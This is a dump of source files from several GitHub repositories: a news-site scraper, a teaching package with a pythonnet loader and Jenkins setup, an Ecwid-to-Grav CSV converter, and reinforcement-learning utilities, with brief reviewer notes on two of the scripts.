shatternox/web-scraper | https://github.com/shatternox/web-scraper | 6a0f0c945fc4e408924edbe2554e88646e0712c7 | 142daa52078f78683c62b3a6898de24bc7dd8375 | 15562b9ab1559c9cd06e1c51baedd9bb83d0e46c | refs/heads/master | 2022-11-21T02:55:20.685349 | 2020-07-26T03:25:44 | 2020-07-26T03:25:44 | 278,882,726 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5882353186607361,
"alphanum_fraction": 0.5907384157180786,
"avg_line_length": 12.735849380493164,
"blob_id": "8bed30bf22ef3e7f64cdb988df6817980eaa0f23",
"content_id": "055aaeb63f1db2e3d76c3bdb5b59c216bad59f23",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 799,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 53,
"path": "/hacker-news.py",
"repo_name": "shatternox/web-scraper",
"src_encoding": "UTF-8",
"text": "import requests\r\nimport bs4\r\n\r\nr = requests.get(\"https://thehackernews.com/\")\r\nsoup = bs4.BeautifulSoup(r.text, 'lxml')\r\n\r\n\r\ntitle = []\r\n\r\nfor x in soup.select('.home-title'):\r\n\r\n\ttitle.append(x.text)\r\n\r\n\r\narticle = []\r\n\r\nfor x in soup.select('.home-desc'):\r\n\r\n\tarticle.append(x.text)\r\n\r\n\r\nimage_title = []\r\n\r\nfor x in soup.select('.home-img-src'):\r\n\r\n\timage_title.append(x['alt'])\r\n\r\n\r\nimage_link = []\r\n\r\nfor x in soup.select('.home-img-src'):\r\n\r\n\timage_link.append(x['data_src'])\r\n\r\n\r\n# Download all the image in the page\r\n\r\nfor x in range(len(image_link)):\r\n\r\n\tlink = requests.get(image_link[x])\r\n\r\n\tf = open(image_title[x] + '.jpg','wb')\r\n\r\n\tf.write(link.content)\r\n\r\n\tf.close()\r\n\r\n\r\narticle_link = []\r\n\r\nfor x in soup.select('.story-link'):\r\n\r\n\tarticle_link.append(x['href'])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
}
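Note on `hacker-news.py` above: it indexes `x['data_src']` on each `.home-img-src` element, but lazy-loaded images conventionally use the hyphenated attribute `data-src`, so if the live page uses that spelling the subscript raises `KeyError` before any image is saved. A more defensive sketch of the download step (the attribute spellings tried here are assumptions, not verified against the current page markup):

    import requests
    import bs4

    r = requests.get("https://thehackernews.com/")
    soup = bs4.BeautifulSoup(r.text, "lxml")

    for img in soup.select(".home-img-src"):
        # .get() returns None instead of raising when an attribute is
        # absent, so we can fall back through the plausible spellings.
        url = img.get("data-src") or img.get("data_src") or img.get("src")
        if not url:
            continue
        name = (img.get("alt") or "image").replace("/", "-")
        with open(name + ".jpg", "wb") as f:
            f.write(requests.get(url).content)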
] | 1 |
GuillaumeSalha/ensae_teaching_cs | https://github.com/GuillaumeSalha/ensae_teaching_cs | b3132bb3e3c2203a4c7f1f632831009db11cfab9 | 734263908825dd03a771ad013edeb591ca9ff0b6 | b8a347626f0cb32eb32d4c5c04cff3119b80e004 | refs/heads/master | 2021-01-11T15:57:13.219104 | 2017-01-20T21:01:18 | 2017-01-20T21:01:18 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6073132157325745,
"alphanum_fraction": 0.6167076230049133,
"avg_line_length": 37.22652053833008,
"blob_id": "b3d8c6b3f4b2b14b9c703ce9778a2e11cdaff34b",
"content_id": "1a7e1b3916184888c62faf5b0644ae725596f9ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6932,
"license_type": "permissive",
"max_line_length": 154,
"num_lines": 181,
"path": "/src/ensae_teaching_cs/pythonnet/__init__.py",
"repo_name": "GuillaumeSalha/ensae_teaching_cs",
"src_encoding": "UTF-8",
"text": "#*-* coding: utf-8 -*-\n\"\"\"\n@file\n@brief Uses `pythonnet <https://github.com/sdpython/pythonnet>`_.\n\n.. faqref::\n :tag: windows\n :title: Unhandled Exception: System.IO.FileLoadException when using Python.Runtime.dll with Python 3.5)\n\n When running for the first time on Python 3.5, the following error came up::\n\n Unhandled Exception: System.IO.FileLoadException: Could not load file or assembly 'file:///<apath>\\Python.Runtime.dll' or one of its dependencies.\n Operation is not supported. (Exception from HRESULT: 0x80131515) ---> System.NotSupportedException: An attempt was made to load an assembly\n from a network location which would have caused the assembly to be sandboxed in previous versions of the .NET Framework.\n This release of the .NET Framework does not enable CAS policy by default, so this load may be dangerous.\n If this load is not intended to sandbox the assembly,\n please enable the loadFromRemoteSources switch.\n See http://go.microsoft.com/fwlink/?LinkId=155569 for more information.\n --- End of inner exception stack trace ---\n at System.Reflection.RuntimeAssembly._nLoad(AssemblyName fileName, String codeBase, Evidence assemblySecurity,\n RuntimeAssembly locationHint, StackCrawlMark& stackMark, IntPtr pPrivHostBinder, Boolean throwOnFileNotFound,\n Boolean forIntrospection, Boolean suppressSecurityChecks)\n at System.Reflection.RuntimeAssembly.InternalLoadAssemblyName(AssemblyName assemblyRef,\n Evidence assemblySecurity, RuntimeAssembly reqAssembly, StackCrawlMark& stackMark,\n IntPtr pPrivHostBinder, Boolean throwOnFileNotFound, Boolean forIntrospection, Boolean suppressSecurityChecks)\n at System.Reflection.RuntimeAssembly.InternalLoadFrom(String assemblyFile, Evidence securityEvidence, Byte[] hashValue,\n AssemblyHashAlgorithm hashAlgorithm, Boolean forIntrospection, Boolean suppressSecurityChecks, StackCrawlMark& stackMark)\n at System.Reflection.Assembly.LoadFrom(String assemblyFile)\n at clrModule.PyInit_clr()\n\n In that case, I suggest to get the source at\n `sdpython/pythonnet <https://github.com/sdpython/pythonnet>`_\n and to compile them with VS 2015 on your machine.\n It will import the missing DLL which I'm still trying to find out.\n The DLL was compiled on an Azure Virtual Machine.\n\"\"\"\n\nimport sys\nimport platform\nimport os\n\nif sys.platform.startswith(\"win\"):\n ver = sys.version_info\n arch = platform.architecture()[0]\n if ver[:2] == (3, 5):\n if \"64\" in arch:\n from .py35x64 import clr\n else:\n raise ImportError(\n \"unable to import pythonnet for this architecture \" +\n str(arch))\n elif ver[:2] == (3, 4):\n if \"64\" in arch:\n from .py34x64 import clr\n elif arch == \"32bit\":\n from .py34 import clr\n else:\n raise ImportError(\n \"unable to import pythonnet for this architecture \" +\n str(arch))\n elif ver[:2] == (3, 3):\n if \"64\" in arch:\n from .py33x64 import clr\n elif arch == \"32bit\":\n from .py33 import clr\n else:\n raise ImportError(\n \"unable to import pythonnet for this architecture \" +\n str(arch))\n else:\n raise ImportError(\n \"unable to import pythonnet for this version of python \" +\n str(ver))\n\n\ndef vocal_synthesis(text, lang=\"fr-FR\", voice=\"\", filename=\"\"):\n \"\"\"\n Utilise la synthèse vocale de Windows\n\n @param text text à lire\n @param lang langue\n @param voice nom de la voix (vide si voix par défaut)\n @param filename nom de fichier pour sauver le résultat au format wav (vide sinon)\n\n .. exref::\n :title: Utiliser une DLL implémentée en C#\n :tag: Technique\n\n .. 
index:: C#,DLL\n\n Le code de la DLL est le suivant. Il a été compilé sous forme de DLL.\n\n ::\n\n namespace ENSAE.Voice\n {\n public static class Speech\n {\n public static void VocalSynthesis(string text, string culture, string filename, string voice)\n {\n SpeechSynthesizer synth = new SpeechSynthesizer();\n\n synth.SelectVoiceByHints(VoiceGender.Neutral, VoiceAge.NotSet, 1, new CultureInfo(culture));\n\n if (!string.IsNullOrEmpty(filename))\n synth.SetOutputToWaveFile(filename);\n if (!string.IsNullOrEmpty(voice))\n synth.SelectVoice(voice);\n\n synth.Speak(text);\n }\n }\n }\n\n Pour l'utiliser, il faut utiliser l'instruction :\n\n ::\n\n from ensae_teaching_cs.pythonnet import clr\n from clr import AddReference\n AddReference(\"ENSAE.Voice\")\n\n Si le programme répond qu'il ne trouve pas le fichier, il suffit\n d'inclure de la répertoire où se trouve la DLL dans la liste ``sys.path``.\n Ensuite on écrit simplement :\n\n ::\n\n from ENSAE.Voice import Speech\n Speech.VocalSynthesis(text, lang, voice, filename)\n\n Il faut voir le notebook :ref:`pythoncsharprst`.\n \"\"\"\n if \"ENSAE.Voice\" not in sys.modules:\n if not sys.platform.startswith(\"win\"):\n raise NotImplementedError(\"only available on Windows\")\n\n path = os.path.abspath(os.path.split(__file__)[0])\n path = os.path.join(path, \"csdll\")\n\n from clr import AddReference\n\n try:\n AddReference(\"ENSAE.Voice\")\n except Exception:\n path = os.path.abspath(os.path.split(__file__)[0])\n path = os.path.join(path, \"csdll\")\n if path not in sys.path:\n sys.path.append(path)\n AddReference(\"ENSAE.Voice\")\n\n from ENSAE.Voice import Speech\n Speech.VocalSynthesis(text, lang, voice, filename)\n\n\ndef import_magic_cs():\n \"\"\"\n import the C# DLL which helps doing C# in a notebooks\n\n @return pointer on C# static class\n \"\"\"\n if \"MagicJupyter\" not in sys.modules:\n if not sys.platform.startswith(\"win\"):\n raise NotImplementedError(\"only available on Windows\")\n\n path = os.path.abspath(os.path.split(__file__)[0])\n path = os.path.join(path, \"csdll\")\n\n from clr import AddReference\n\n try:\n AddReference(\"MagicJupyter\")\n except Exception:\n path = os.path.abspath(os.path.split(__file__)[0])\n path = os.path.join(path, \"csdll\")\n if path not in sys.path:\n sys.path.append(path)\n AddReference(\"MagicJupyter\")\n\n from MagicJupyter import MagicCS\n return MagicCS\n"
},
{
"alpha_fraction": 0.6740220785140991,
"alphanum_fraction": 0.6780341267585754,
"avg_line_length": 32.233333587646484,
"blob_id": "2b1670730fd2d26a1d7104132837998776752020",
"content_id": "f767edb40f4aee4542a5e9e54c224e0c7771577b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 997,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 30,
"path": "/jenkins_setup.py",
"repo_name": "GuillaumeSalha/ensae_teaching_cs",
"src_encoding": "UTF-8",
"text": "\"\"\"\ncopy the documentation to the website\n\"\"\"\nimport sys\nimport os\nsys.path.append(os.path.abspath(\"../pyquickhelper/src\"))\nsys.path.append(os.path.abspath(\"../pyensae/src\"))\nsys.path.append(os.path.abspath(\"../ensae_teaching_cs/src\"))\nsys.path.append(os.path.abspath(\"../pymyinstall/src\"))\n\nfrom pyquickhelper.loghelper import fLOG\nfrom pyquickhelper.jenkinshelper import JenkinsExt\nfrom ensae_teaching_cs.automation.jenkins_helper import setup_jenkins_server, engines_default\n\nfLOG(OutputPrint=True)\nfLOG(\"start\")\n\nimport keyring\nuser = keyring.get_password(\"jenkins\", os.environ[\"COMPUTERNAME\"] + \"user\")\npwd = keyring.get_password(\"jenkins\", os.environ[\"COMPUTERNAME\"] + \"pwd\")\n\n\njs = JenkinsExt('http://localhost:8080/', user, pwd,\n fLOG=fLOG, engines=engines_default())\n\nsetup_jenkins_server(js,\n overwrite=True,\n delete_first=False,\n location=\"d:\\\\jenkins\\\\pymy\",\n disable_schedule=False)\n"
},
{
"alpha_fraction": 0.8591549396514893,
"alphanum_fraction": 0.8732394576072693,
"avg_line_length": 7.875,
"blob_id": "04d6e313eae849143ec4ea83d5da7dea3d872d57",
"content_id": "af9496ecf8592bddd18dcef88b49e2d1d9ca8022",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 71,
"license_type": "permissive",
"max_line_length": 12,
"num_lines": 8,
"path": "/requirements2.txt",
"repo_name": "GuillaumeSalha/ensae_teaching_cs",
"src_encoding": "UTF-8",
"text": "bayespy\ncloudpickle\ndask\nggplot\nmpld3\nscikit-learn\nseaborn\nstatsmodels\n"
},
{
"alpha_fraction": 0.9245283007621765,
"alphanum_fraction": 0.9245283007621765,
"avg_line_length": 9.800000190734863,
"blob_id": "6896893a71c639ba6b6de76e0db99d9217f192ed",
"content_id": "34c3a5580b9f59e93e6c368ecbb64fbdae0f6f05",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 13,
"num_lines": 5,
"path": "/requirements_ext.txt",
"repo_name": "GuillaumeSalha/ensae_teaching_cs",
"src_encoding": "UTF-8",
"text": "pyquickhelper\npyensae\npymmails\npymyinstall\npyrsslocal"
},
{
"alpha_fraction": 0.8126801252365112,
"alphanum_fraction": 0.8126801252365112,
"avg_line_length": 33.70000076293945,
"blob_id": "358ca215a0a84a62dee14e0706a26b77ebe0f5ae",
"content_id": "1a0f4e562273c2e5e3267fdf5f5bc8292de3a4b3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 347,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 10,
"path": "/src/ensae_teaching_cs/automation/__init__.py",
"repo_name": "GuillaumeSalha/ensae_teaching_cs",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@file\n@brief Shortcuts for automation\n\"\"\"\n\nfrom .jenkins_helper import setup_jenkins_server, default_jenkins_jobs\nfrom .ftp_publish_helper import publish_documentation, publish_teachings_to_web\nfrom .notebook_test_helper import execute_notebooks\nfrom .modules_documentation import rst_table_modules\nfrom .module_backup import ftp_list_modules\n"
}
] | 5 |
garethbilaney/toGRAVConverter | https://github.com/garethbilaney/toGRAVConverter | e1c6b27d7b3213bb8f1a069acca20d2b65846331 | d3da7de6e685362a5245b4715ecabdeaaf8091c4 | 0e2ab79bb37dba58bd2bc7c4a24768ebeba53e5e | refs/heads/master | 2022-11-07T02:59:05.933525 | 2020-06-23T17:38:40 | 2020-06-23T17:38:40 | 268,150,646 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4618591070175171,
"alphanum_fraction": 0.4747811555862427,
"avg_line_length": 32.31944274902344,
"blob_id": "7c22b6d03f8161f53d801dedb7a6f3a547d1a497",
"content_id": "ee6cae3d5ea62fc4ae7850ef1c92655da7af0296",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2399,
"license_type": "permissive",
"max_line_length": 168,
"num_lines": 72,
"path": "/ecwid/ecwid.py",
"repo_name": "garethbilaney/toGRAVConverter",
"src_encoding": "UTF-8",
"text": "# ecwid csv file to grav pages\n\n\n# pip install urllib3\n\nimport csv, sys, os, io, codecs, urllib, requests\n\ndef getIMG(url, path, name):\n thisPath = path + '/' + name + '.jpg'\n print(thisPath)\n urllib.urlretrieve(url, thisPath)\n r = requests.get(url)\n\nwith open('import.csv', 'r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=';')\n # os.mkdir('toGrav')\n\n\n\n\n for line in csv_reader:\n\n\n # file handler\n path = 'import/' + line[23][22:].split(\"p/\")[0].lower() #replace(\"p/\", \"p\").replace(\"/\", \"-\")\n if not os.path.exists(path):\n os.makedirs (path)\n # Create file\n print(path)\n\n # download product image\n if(line[6].endswith('.jpg')):\n getIMG(line[6], path, line[0].lower().replace(\" \", \"-\").replace(\"/\", \"-\").replace(\",\", \"-\"))\n\n header = '---' + '\\n' + 'title: ' + line[0] + '\\n' + \"sku: \" + line[1] + '\\n' + 'published: true' + '\\n' + 'product: true' + '\\n' + '---' + '\\n'\n if(line[6].endswith('.jpg')):\n content = header + '# ' + line[0] + '\\n\\n' + '![' + line[0] + '](' + line[0].lower().replace(\" \", \"-\").replace(\"/\", \"-\") + '.jpg)' + '\\n\\n' + line[2] + '\\n'\n else:\n content = header + '# ' + line[0] + '\\n\\n' + line[2] + '\\n'\n path = path + '/blog_overview.en.md'\n\n with codecs.open(path, mode=\"w\", encoding=\"utf-8\") as f:\n f.write(unicode(content, \"utf-8\"))\n\n #def getJPG(url, filepath, filename):\n # jpgpath = filepath + filename + '.jpg'\n # urllib3.request.urlretrieve(url,jpgpath)\n #file = codecs.open('path','w','utf-8')\n #file.write(u'\\ufeff')\n #file.close()\n\n\n #MD = os.open(path, os.O_RDWR|os.O_CREAT)\n #header = '---' + '\\n' + 'title: ' + line[0] + '\\n' + \"sku: \" + line[1] + '\\n' + 'published: true' + '\\n' + 'product: true' + '\\n' + '---' + '\\n'\n #content = header + '# ' + line[0] + '\\n\\n' + line[2] + '\\n'\n #content = unicode(content, \"utf-8\")\n # thisLine = unicode.encode(content)\n #numBytes = os.write(MD, content)\n #os.close(MD)\n\n\n # Debug\n\n # print('---')\n # print('title: ' + line[0])\n # print(\"sku: \" + line[1])\n # print('published: true')\n # print('product: true')\n # print('---')\n # content\n # print(\"# \" + line[0])\n # print(line[2])\n"
}
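Note on `ecwid.py` above: it is Python 2 code, since `urllib.urlretrieve` and the `unicode(...)` built-in no longer exist in Python 3, both the image download and the Markdown write fail on a modern interpreter. A rough Python 3 sketch of just the download helper, keeping the original's behavior (naming and layout follow the original; this is not a drop-in port of the whole script):

    import os
    import requests

    def get_img(url, path, name):
        """Fetch url into <path>/<name>.jpg; replaces the py2
        urllib.urlretrieve call in the original getIMG()."""
        os.makedirs(path, exist_ok=True)
        resp = requests.get(url, timeout=30)
        resp.raise_for_status()
        with open(os.path.join(path, name + ".jpg"), "wb") as f:
            f.write(resp.content)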
] | 1 |
Scitator/Run-Skeleton-Run | https://github.com/Scitator/Run-Skeleton-Run | 0f74e04bdce00dc505720f533490424892c3bf9a | c8aefbc448f2d78699355eb843c75a78ac5132a4 | a5033285dc07ff50712bc93ea52d46396e4aef65 | refs/heads/master | 2022-02-24T20:28:02.807560 | 2019-10-15T19:51:49 | 2019-10-15T19:51:49 | 110,868,459 | 95 | 18 | MIT | 2017-11-15T18:04:29 | 2018-08-31T03:55:18 | 2018-01-22T15:20:52 | Python |
[
{
"alpha_fraction": 0.624365508556366,
"alphanum_fraction": 0.6300056576728821,
"avg_line_length": 28.549999237060547,
"blob_id": "9ca13ac7934d7890e3e31db703b2b2ed4e76ffff",
"content_id": "2aee7e8efd9640d1fd1e64eb943cd60a3cafceee",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1773,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 60,
"path": "/common/loss.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport torch\nimport torch.nn as nn\n\n\ndef create_linear_decay_fn(initial_value, final_value, max_step):\n def decay_fn(step):\n relative = 1. - step / max_step\n return initial_value * relative + final_value * (1. - relative)\n\n return decay_fn\n\n\ndef create_cycle_decay_fn(initial_value, final_value, cycle_len, num_cycles):\n max_step = cycle_len * num_cycles\n\n def decay_fn(step):\n relative = 1. - step / max_step\n relative_cosine = 0.5 * (np.cos(np.pi * np.mod(step, cycle_len) / cycle_len) + 1.0)\n return relative_cosine * (initial_value - final_value) * relative + final_value\n\n return decay_fn\n\n\ndef create_decay_fn(decay_type, **kwargs):\n if decay_type == \"linear\":\n return create_linear_decay_fn(**kwargs)\n elif decay_type == \"cycle\":\n return create_cycle_decay_fn(**kwargs)\n else:\n raise NotImplementedError()\n\n\nclass QuadricLinearLoss(nn.Module):\n def __init__(self, clip_delta):\n super(QuadricLinearLoss, self).__init__()\n self.clip_delta = clip_delta\n\n def forward(self, y_pred, y_true, weights):\n td_error = y_true - y_pred\n td_error_abs = torch.abs(td_error)\n quadratic_part = torch.clamp(td_error_abs, max=self.clip_delta)\n linear_part = td_error_abs - quadratic_part\n loss = 0.5 * quadratic_part ** 2 + self.clip_delta * linear_part\n loss = torch.mean(loss * weights)\n return loss\n\nlosses = {\n \"mse\": nn.MSELoss,\n \"quadric-linear\": QuadricLinearLoss\n}\n\n\ndef create_loss(args):\n if args.loss_type == \"mse\":\n return nn.MSELoss()\n elif args.loss_type == \"quadric-linear\":\n return QuadricLinearLoss(clip_delta=args.clip_delta)\n else:\n raise NotImplementedError()\n"
},
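Note on `common/loss.py` above: `QuadricLinearLoss` is a Huber-style TD loss, quadratic inside `clip_delta` and linear beyond it, which caps the gradient magnitude for outlier TD errors. With e = y_true - y_pred and delta = clip_delta it evaluates to 0.5*e**2 for |e| <= delta and delta*(|e| - 0.5*delta) otherwise. A quick numeric check of the piecewise form (values are illustrative):

    import torch

    clip_delta = 1.0
    e = torch.tensor([0.5, 3.0])              # one small, one large TD error
    quad = torch.clamp(e.abs(), max=clip_delta)
    lin = e.abs() - quad
    loss = 0.5 * quad ** 2 + clip_delta * lin
    print(loss)  # tensor([0.1250, 2.5000]): 0.5*0.5**2 and 1.0*3.0 - 0.5*1.0**2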
{
"alpha_fraction": 0.5301932096481323,
"alphanum_fraction": 0.5567632913589478,
"avg_line_length": 30.846153259277344,
"blob_id": "c9c99f786923f8efde7121d31c1329959251448d",
"content_id": "0b8473a20147cf4ec1373b8ecc57f514f4033a87",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1656,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 52,
"path": "/baselines/baselines_common/mpi_moments.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from mpi4py import MPI\nimport numpy as np\nfrom baselines.baselines_common import zipsame\n\n\ndef mpi_moments(x, axis=0):\n x = np.asarray(x, dtype='float64')\n newshape = list(x.shape)\n newshape.pop(axis)\n n = np.prod(newshape, dtype=int)\n totalvec = np.zeros(n * 2 + 1, 'float64')\n addvec = np.concatenate([x.sum(axis=axis).ravel(),\n np.square(x).sum(axis=axis).ravel(),\n np.array([x.shape[axis]], dtype='float64')])\n MPI.COMM_WORLD.Allreduce(addvec, totalvec, op=MPI.SUM)\n sum = totalvec[:n]\n sumsq = totalvec[n:2 * n]\n count = totalvec[2 * n]\n if count == 0:\n mean = np.empty(newshape);\n mean[:] = np.nan\n std = np.empty(newshape);\n std[:] = np.nan\n else:\n mean = sum / count\n std = np.sqrt(np.maximum(sumsq / count - np.square(mean), 0))\n return mean, std, count\n\n\ndef test_runningmeanstd():\n comm = MPI.COMM_WORLD\n np.random.seed(0)\n for (triple, axis) in [\n ((np.random.randn(3), np.random.randn(4), np.random.randn(5)), 0),\n ((np.random.randn(3, 2), np.random.randn(4, 2), np.random.randn(5, 2)), 0),\n ((np.random.randn(2, 3), np.random.randn(2, 4), np.random.randn(2, 4)), 1),\n ]:\n\n x = np.concatenate(triple, axis=axis)\n ms1 = [x.mean(axis=axis), x.std(axis=axis), x.shape[axis]]\n\n ms2 = mpi_moments(triple[comm.Get_rank()], axis=axis)\n\n for (a1, a2) in zipsame(ms1, ms2):\n print(a1, a2)\n assert np.allclose(a1, a2)\n print(\"ok!\")\n\n\nif __name__ == \"__main__\":\n # mpirun -np 3 python <script>\n test_runningmeanstd()\n"
},
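Note on `mpi_moments.py` above: it reduces per-rank partial sums rather than per-rank means. Every worker contributes (sum x, sum x**2, n), a single Allreduce adds them, and the global statistics follow from mean = sum(x)/n and var = sum(x**2)/n - mean**2. The same identity without MPI, as a sanity check over hypothetical shards:

    import numpy as np

    shards = [np.random.randn(3), np.random.randn(4), np.random.randn(5)]
    # per-shard partial sums, then one "reduce" (plain addition here)
    s = sum(x.sum() for x in shards)
    sq = sum(np.square(x).sum() for x in shards)
    n = sum(x.size for x in shards)
    mean = s / n
    std = np.sqrt(max(sq / n - mean ** 2, 0.0))
    full = np.concatenate(shards)
    assert np.allclose([mean, std], [full.mean(), full.std()])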
{
"alpha_fraction": 0.49325764179229736,
"alphanum_fraction": 0.5180979371070862,
"avg_line_length": 21.725807189941406,
"blob_id": "4c31de8b5786f85d8726d86f0a1db4165eda8825",
"content_id": "6def0c92689fab558e06ccf6d879eb61827470cb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1409,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 62,
"path": "/baselines/baselines_common/console_util.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nfrom contextlib import contextmanager\nimport numpy as np\nimport time\n\n\n# ================================================================\n# Misc\n# ================================================================\n\ndef fmt_row(width, row, header=False):\n out = \" | \".join(fmt_item(x, width) for x in row)\n if header: out = out + \"\\n\" + \"-\" * len(out)\n return out\n\n\ndef fmt_item(x, l):\n if isinstance(x, np.ndarray):\n assert x.ndim == 0\n x = x.item()\n if isinstance(x, float):\n rep = \"%g\" % x\n else:\n rep = str(x)\n return \" \" * (l - len(rep)) + rep\n\n\ncolor2num = dict(\n gray=30,\n red=31,\n green=32,\n yellow=33,\n blue=34,\n magenta=35,\n cyan=36,\n white=37,\n crimson=38\n)\n\n\ndef colorize(string, color, bold=False, highlight=False):\n attr = []\n num = color2num[color]\n if highlight: num += 10\n attr.append(str(num))\n if bold: attr.append('1')\n return '\\x1b[%sm%s\\x1b[0m' % (';'.join(attr), string)\n\n\nMESSAGE_DEPTH = 0\n\n\n@contextmanager\ndef timed(msg):\n global MESSAGE_DEPTH # pylint: disable=W0603\n print(colorize('\\t' * MESSAGE_DEPTH + '=: ' + msg, color='magenta'))\n tstart = time.time()\n MESSAGE_DEPTH += 1\n yield\n MESSAGE_DEPTH -= 1\n print(colorize('\\t' * MESSAGE_DEPTH + \"done in %.3f seconds\" % (time.time() - tstart),\n color='magenta'))\n"
},
{
"alpha_fraction": 0.4756229817867279,
"alphanum_fraction": 0.5048754215240479,
"avg_line_length": 23.289474487304688,
"blob_id": "1d79b9cf5a3a9d89d4df50d46784a0d07e787f4e",
"content_id": "59fda0e3688a4f4a2bef957753b71f80faccda65",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 923,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 38,
"path": "/baselines/baselines_common/cg.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\ndef cg(f_Ax, b, cg_iters=10, callback=None, verbose=False, residual_tol=1e-10):\n \"\"\"\n Demmel p 312\n \"\"\"\n p = b.copy()\n r = b.copy()\n x = np.zeros_like(b)\n rdotr = r.dot(r)\n\n fmtstr = \"%10i %10.3g %10.3g\"\n titlestr = \"%10s %10s %10s\"\n if verbose:\n print(titlestr % (\"iter\", \"residual norm\", \"soln norm\"))\n\n for i in range(cg_iters):\n if callback is not None:\n callback(x)\n if verbose: print(fmtstr % (i, rdotr, np.linalg.norm(x)))\n z = f_Ax(p)\n v = rdotr / p.dot(z)\n x += v * p\n r -= v * z\n newrdotr = r.dot(r)\n mu = newrdotr / rdotr\n p = r + mu * p\n\n rdotr = newrdotr\n if rdotr < residual_tol:\n break\n\n if callback is not None:\n callback(x)\n if verbose:\n print(fmtstr % (i + 1, rdotr, np.linalg.norm(x))) # pylint: disable=W0631\n return x\n"
},
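Note on `cg.py` above: the solver only touches the matrix through the callback `f_Ax`, so callers never materialize A explicitly; the TRPO code uses this to solve F*s = g where F is available only as Fisher-vector products. A minimal usage sketch with a small explicit SPD matrix standing in for the operator (matrix and right-hand side below are made up):

    import numpy as np
    from baselines.baselines_common.cg import cg

    A = np.array([[4.0, 1.0],
                  [1.0, 3.0]])      # symmetric positive definite
    b = np.array([1.0, 2.0])

    x = cg(lambda v: A.dot(v), b, cg_iters=25)
    assert np.allclose(A.dot(x), b, atol=1e-6)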
{
"alpha_fraction": 0.7021276354789734,
"alphanum_fraction": 0.7340425252914429,
"avg_line_length": 46,
"blob_id": "4fd48cdb3993bce7e7fcceb3f6cb78887b456404",
"content_id": "80b4ad792634b237485f8413298464857898fcbb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 94,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 2,
"path": "/setup_conda.sh",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nconda create -n opensim-rl -c kidzik opensim git python=3.5.2 anaconda -y\n"
},
{
"alpha_fraction": 0.5655650496482849,
"alphanum_fraction": 0.5746268630027771,
"avg_line_length": 29.25806427001953,
"blob_id": "44dbe1ab427463fdcfbcfba9539fed0d8bac5f3f",
"content_id": "6a61a4ed88d09f474a7c9aee44c45e7d0ee1a3d5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1876,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 62,
"path": "/common/random_process.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass RandomProcess(object):\n def reset_states(self):\n pass\n\n\nclass AnnealedGaussianProcess(RandomProcess):\n def __init__(self, mu, sigma, sigma_min, n_steps_annealing=int(1e5)):\n self.mu = mu\n self.sigma = sigma\n self.n_steps = 0\n\n if sigma_min is not None:\n self.m = -float(sigma - sigma_min) / float(n_steps_annealing)\n self.c = sigma\n self.sigma_min = sigma_min\n else:\n self.m = 0.\n self.c = sigma\n self.sigma_min = sigma\n\n @property\n def current_sigma(self):\n sigma = max(self.sigma_min, self.m * float(self.n_steps) + self.c)\n return sigma\n\n\nclass OrnsteinUhlenbeckProcess(AnnealedGaussianProcess):\n def __init__(self, theta, mu=0., sigma=1., dt=1e-2,\n x0=None, size=1, sigma_min=None, n_steps_annealing=int(1e5)):\n super(OrnsteinUhlenbeckProcess, self).__init__(\n mu=mu, sigma=sigma, sigma_min=sigma_min, n_steps_annealing=n_steps_annealing)\n self.theta = theta\n self.mu = mu\n self.dt = dt\n self.x0 = x0\n self.size = size\n self.reset_states()\n\n def sample(self):\n x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \\\n self.current_sigma * np.sqrt(self.dt) * np.random.normal(size=self.size)\n self.x_prev = x\n self.n_steps += 1\n return x\n\n def reset_states(self):\n self.x_prev = self.x0 if self.x0 is not None else np.zeros(self.size)\n\n\ndef create_random_process(args):\n if args.rp_type == \"ornstein-uhlenbeck\":\n return 